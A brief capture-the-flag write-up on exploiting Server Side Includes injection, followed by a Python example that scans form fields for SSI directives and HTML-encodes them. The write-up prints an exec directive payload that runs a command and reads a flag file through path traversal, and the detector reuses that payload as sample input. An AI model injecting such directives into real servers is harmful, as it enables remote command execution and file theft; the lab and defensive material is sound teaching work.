SSI Injection

Exploit the SSI Injection vulnerability to obtain RCE and read the flag.

This exercise is pretty straightforward: we just have to adapt the SSI exec directive to the application.

<!--#exec cmd="UNIX command" -->
<!--#exec cmd="cat ../../../flag.txt" -->

After looking into the directories we managed to get the flag with the command above!
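
The defensive side of the directive shown above, as an added example that is not part of the original write-up: a check that parses SSI directives out of user-supplied values before they reach a page the server parses for includes, and an encoder that neutralizes them. The function names, the sample fields and the HIGH_RISK policy are assumptions made for this illustration.

```python
import html
import re

# An SSI directive has the form <!--#name attr="value" ... -->
SSI_DIRECTIVE = re.compile(r'<!--#(\w+)(.*?)-->', re.IGNORECASE | re.DOTALL)
SSI_ATTR = re.compile(r'(\w+)\s*=\s*(["\'`])(.*?)\2', re.DOTALL)

# Directives that run commands or pull in other files (assumed policy for this example)
HIGH_RISK = {"exec", "include"}


def find_ssi_directives(value):
    """Return (directive, attributes, high_risk) for every SSI directive in a string."""
    findings = []
    for match in SSI_DIRECTIVE.finditer(value):
        name = match.group(1).lower()
        attrs = {k.lower(): v for k, _quote, v in SSI_ATTR.findall(match.group(2))}
        findings.append((name, attrs, name in HIGH_RISK))
    return findings


def neutralize(value):
    """HTML-encode the value so the SSI parser never sees a literal '<!--#'."""
    return html.escape(value, quote=True)


def scan_fields(fields):
    """Map each submitted field name to the directives found in its value."""
    report = {}
    for field, value in fields.items():
        hits = find_ssi_directives(value)
        if hits:
            report[field] = hits
    return report


# Constructed sample input: one benign field, the directive from this page,
# and a low-risk echo directive embedded in ordinary text.
SAMPLE_FIELDS = {
    "name": "alice",
    "comment": '<!--#exec cmd="cat ../../../flag.txt" -->',
    "bio": 'hi <!--#echo var="DATE_LOCAL" --> there',
}

if __name__ == "__main__":
    for field, hits in scan_fields(SAMPLE_FIELDS).items():
        for name, attrs, risky in hits:
            print(field, name, attrs, "HIGH" if risky else "low")
        print("  stored as:", neutralize(SAMPLE_FIELDS[field]))
```

Encoding on output is the fix; the scan is for logging and alerting. If the server is Apache httpd, Options IncludesNOEXEC additionally disables the exec directive.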
